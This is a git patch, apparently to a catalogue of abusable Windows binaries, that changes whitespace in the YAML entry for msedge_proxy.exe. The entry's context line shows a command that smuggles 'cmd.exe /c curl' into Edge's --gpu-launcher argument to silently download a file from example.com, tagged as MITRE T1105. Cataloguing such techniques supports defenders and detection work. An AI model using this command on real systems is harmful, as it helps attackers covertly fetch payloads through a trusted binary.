From 0f3b483ae16bc0dee8f662118aedc5ac50116a6d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 25 Aug 2023 21:23:41 +0300 Subject: [PATCH] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 3658060..1bbf15c 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,6 +1,6 @@ --- Name: msedge_proxy.exe -Description: Microsoft Edge Browser +Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: @@ -12,7 +12,7 @@ Commands: MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" - Description: Edge will silently download the file. + Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download Privileges: User